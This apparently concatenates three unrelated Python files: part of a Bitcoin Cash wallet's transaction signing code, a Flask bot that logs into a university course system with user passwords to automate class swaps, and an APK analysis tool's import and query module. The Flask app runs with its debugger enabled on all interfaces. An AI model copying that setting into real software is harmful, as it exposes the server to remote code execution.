# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This is function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cach resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
satoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimated of serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
# and caller said it's ok to go out ot network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
# deserializd tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise of error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
(the returned list will always be exactly equal to len(self._inputs),
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
# make sure to return a copy of the transaction from the cache
# so that if caller does .deserialize(), *his* instance will
# use up 10x memory consumption, and not the cached instance which
# should just be an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
electroncash/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturn.Error(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturn.TooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput.protocol_factory(op_return_script), amount)
# /OPReturn
|
application.py
|
# -*- coding: utf-8 -*-
from flask import Flask, request, render_template
from flask_cors import CORS
from concurrent.futures import ThreadPoolExecutor
import threading
import json
from swap_class import *
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s.%(msecs)03d %(levelname)s:\t%(message)s', datefmt='%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(__name__)
app = Flask(__name__, static_folder="static", template_folder="templates")
CORS(app)
bot = Hkuspace_bot()
main_swap_bot = Parallel_swap()
@app.route("/")
def test_page():
return render_template("index.html")
@app.route("/login", methods=["POST"])
def login_hkuspace():
request_data = request.get_json()
login_name = request_data["username"]
password = request_data["password"]
valid = bot.login_space(login_name, password)
if valid == False:
return {"code": 401, "message": "Unauthorized username or password"}, 401
else:
# bot.get_time_table()
return {"code": 200, "message": "Successfully login"}, 200
@app.route("/login-close", methods=["GET"])
def close_login():
valid = bot.check_login()
if valid == True:
return {"code": 200, "message": "Login page closed successfully"}, 200
else:
return {"code": 404, "message": "Google chrome not found"}, 404
@app.route("/status", methods=["GET"])
def check_status():
valid = False
while valid == False:
valid = bot.check_status()
time.sleep(5)
return {"code": 200, "message": "The swap platform is ready"}, 200
@app.route("/check-class", methods=["POST"])
def check_class():
request_data = request.get_json()
class_id = request_data["course_code"]
result = bot.swap_class_check(class_id)
return json.dumps(result), 200
@app.route("/add-drop", methods=["POST"])
def add_drop_class():
request_data = request.get_json()
class_drop = request_data["origin_code"]
class_add = request_data["new_code"]
class_id = request_data["new_class"]
boost = request_data["boost"]
if boost == True:
target = request_data["crush_num"]
result = bot.add_drop_class(
class_drop, class_add, class_id, boost, target)
else:
result = bot.add_drop_class(class_drop, class_add, class_id, boost)
logger.debug(f"Json return: {request_data}")
return json.dumps(result), 200
@app.route("/main-swap", methods=["POST"])
def main_swap():
request_data = request.get_json()
logger.debug(f"Total add-drop: {request_data}")
username = request_data["username"]
password = request_data["password"]
data = request_data["data"]
workers = len(data)
thread1 = threading.Thread(
target=thread_func, args=(username, password, data, workers,))
thread1.start()
return {"code": 200, "message": "The program started!"}
def thread_func(username, password, request_data, workers=3):
data = [{"username": username, "password": password,
"request_data": request_data[i]} for i in range(0, workers)]
with ThreadPoolExecutor() as e:
results = list(e.map(main_swap_bot.main, data))
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)
|
__init__.py
|
# encoding: utf-8
import imp
from itertools import repeat
from multiprocessing import Value, RLock, cpu_count
from multiprocessing.process import Process
import os
import sys
from androlyze import settings
from androlyze.loader.exception import ApkImportError
from androlyze.log.Log import clilog, log
from androlyze.model.analysis.result import StaticResultKeys
from androlyze.model.script import ScriptUtil
from androlyze.settings import SECTION_ANDROGUARD, KEY_ANDROGUARD_PATH, \
CONFIG_PATH, DEFAULTS_PATH
from androlyze.settings.Settings import Settings
from androlyze.storage import Util
from androlyze.storage.exception import StorageException
from androlyze.storage.resultdb import MongoUtil
from androlyze.util import Util
from androlyze.Constants import *
__all__ = []
__author__ = u"Nils Tobias Schmidt, Lars Baumgärtner"
__copyright__ = PROJECT_COPYRIGHT
__license__ = PROJECT_LICENSE
__version__ = PROJECT_VERSION
__email__ = "{schmidt89,lbaumgaertner}@informatik.uni-marburg.de"
try:
# load androguard
Util.set_androguard_path(settings.singleton)
# import namespace of androguards androlyze.py module
imp.load_source("androlyze", "%s/androlyze.py" % settings.singleton[(SECTION_ANDROGUARD, KEY_ANDROGUARD_PATH)])
from androlyze import *
except Exception as e:
log.error(e)
############################################################
#---Import
############################################################
def action_import_apks(storage, apk_paths,
copy_apk = False, copy_to_mongodb = False,
update = False, tag = None,
# shared memory
cnt_imported_apks = None, total_apk_count = None, import_finished = None,
# concurrent settings
concurrency = None
):
''' Import the apks from the `apk_paths` and create the file system structure
where the results will be kept, specified by `storage`.
Parameters
----------
storage : RedundantStorage
The store to use.
apk_paths : iterable<str>
The apk files and/or directories.
copy_apk : bool
Import the apk file to the `import_dir` (copy it).
copy_to_mongodb : bool, optional (default is False)
Also import into MongoDB. Useful for the distributed analysis.
update : bool
Update apks that have already been imported.
tag : str, optional (default is None)
Some tag
cnt_imported_apks : multiprocessing.Value<int>, optional (default is None)
If given, use for progress updating.
total_apk_count : multiprocessing.Value<int>, optional (default is None)
If given, use for total count of apks.
import_finished : multiprocessing.Value<byte>, optional (default is None)
If given, use to signal that import has been completed.
concurrency : int, optional (default is number of cpus)
Number of processes to use for the import.
'''
from androlyze.loader.ApkImporter import ApkImporter
# get single paths to apks so we get the correct total count of apks
clilog.info("looking for apks in given paths ... ")
apk_paths = ApkImporter.get_apks_from_list_or_dir(apk_paths)
if total_apk_count is not None:
# may be time consuming for recursive lookup
apk_paths, total_apk_count.value = Util.count_iterable_n_clone(apk_paths)
# create count if not given
if cnt_imported_apks is None:
cnt_imported_apks = Value('i', 0, lock = RLock())
# set concurrency
if concurrency is None:
concurrency = cpu_count()
log.warn("Using %d processes", concurrency)
clilog.info("Storage dir is %s" % storage.fs_storage.store_root_dir)
if copy_apk:
clilog.info("Copying APKs to %s ..." % storage.fs_storage.store_root_dir)
def import_apks(apk_paths):
apk_importer = ApkImporter(apk_paths, storage)
for apk in apk_importer.import_apks(copy_apk = copy_apk, copy_to_mongodb = copy_to_mongodb,
update = update, tag = tag):
clilog.info("imported %s", apk.short_description())
# use shared memory counter if given
if cnt_imported_apks is not None:
with cnt_imported_apks.get_lock():
cnt_imported_apks.value += 1
pool = []
# don't convert generator to list if only 1 process wanted
apk_paths = [apk_paths] if concurrency == 1 else Util.split_n_uniform_distri(list(apk_paths), concurrency)
# start parallel import
# multiprocessing's pool causes pickle errors
for i in range(concurrency):
p = Process(target = import_apks, args = (apk_paths[i], ))
log.debug("starting process %s", p)
pool.append(p)
p.start()
for it in pool:
log.debug("joined on process %s", p)
it.join()
apks_imported = cnt_imported_apks.value != 0
# show some message that no APK has been imported
if not apks_imported:
log.warn("No .apk file has been imported! This means no .apk file has been found or they already have been imported.")
else:
clilog.info("done")
# because not all apks may be importable, we cannot use we count for signal that the import is done
if import_finished is not None:
import_finished.value = 1
clilog.info("Imported %d apks", cnt_imported_apks.value)
############################################################
#---Query
############################################################
############################################################
#--- Query commands
############################################################
# query subcommands
COMMAND_QUERY_APKS = "apks"
COMMAND_QUERY_HASHES = "hashes"
COMMAND_QUERY_PACKAGE_NAMES = "package-names"
COMMAND_QUERY_PATHS = "paths"
COMMAND_QUERY_INFOS_ALL = "infos-all"
COMMAND_QUERY_INFOS = "infos"
COMMAND_QUERY_VERSIONS = "versions"
QUERY_COMMANDS = (COMMAND_QUERY_HASHES, COMMAND_QUERY_PACKAGE_NAMES,
COMMAND_QUERY_INFOS_ALL, COMMAND_QUERY_INFOS,
COMMAND_QUERY_VERSIONS, COMMAND_QUERY_APKS, COMMAND_QUERY_PATHS)
# TODO: ADD CHECKS FOR OTHER VALUES!
def action_query_result_db(storage, checks = {}, **kwargs):
'''
Get results from the database.
Parameters
----------
storage : ResultsStorageInterface
The store to use.
checks : dict, optional (default is {})
Dictionary describing the checks to perform on some values.
Will be passed to :py:method:`.MongoUtil.build_checks_filter` (as keyword arguments)
checks_non_empty_list : iterable<str>, optional (default is ())
Check the keys against a non empty list.
checks_empty_list : iterable<str>, optional (default is ())
Check the keys against an empty list.
checks_true : iterable<str>, optional (default is ())
Check if the values of the given keys are true.
checks_false : iterable<str>, optional (default is ())
Check if the values of the given keys are false.
checks_not_null : iterable<str>, optional (default is ())
Check if the values of the given keys are null (python None).
checks_null : iterable<str>, optional (default is ())
Check if the values of the given keys are not null (python None).
conjunction : str, optional (default is 'or')
Choose between 'or' and 'and'.
Specifies how to to link the checks together.
Other Parameters
----------------
include_fields : list<str>, optional (default is [])
List of fields to include in the result.
Mutually exclusive with `exclude_fields`.
exclude_fields : list<str>, optional (default is [])
List of fields to exclude from the result.
Mutually exclusive with `include_fields`.
where : dict, optional (default is {})
A filter.
remove_id_field : bool, optional (default is True)
Will remove the `_id` field by default.
distinct_key : str, optional (default is None)
If given, list the distinct values for the `distinct_key.
list_ran_scripts: bool, optional (default is False)
List all scripts that have been run on the given selection.
Normally you want to supply the `package_name`.
Overrides `distinct_key`.
sort : bool, optional (default is True)
If true sort by analysis date.
latest : bool, optional (default is False)
Get the result of the latest script run.
Will only return one result.
n : int, optional (default is None)
Number of results to return.
None means no limit.
non_document : bool, optional (default is False)
Get custom data from mongodb's gridfs.
non_document_raw : bool, optional (default is False)
Get the raw data from the database. Otherwise meta infos will be returned.
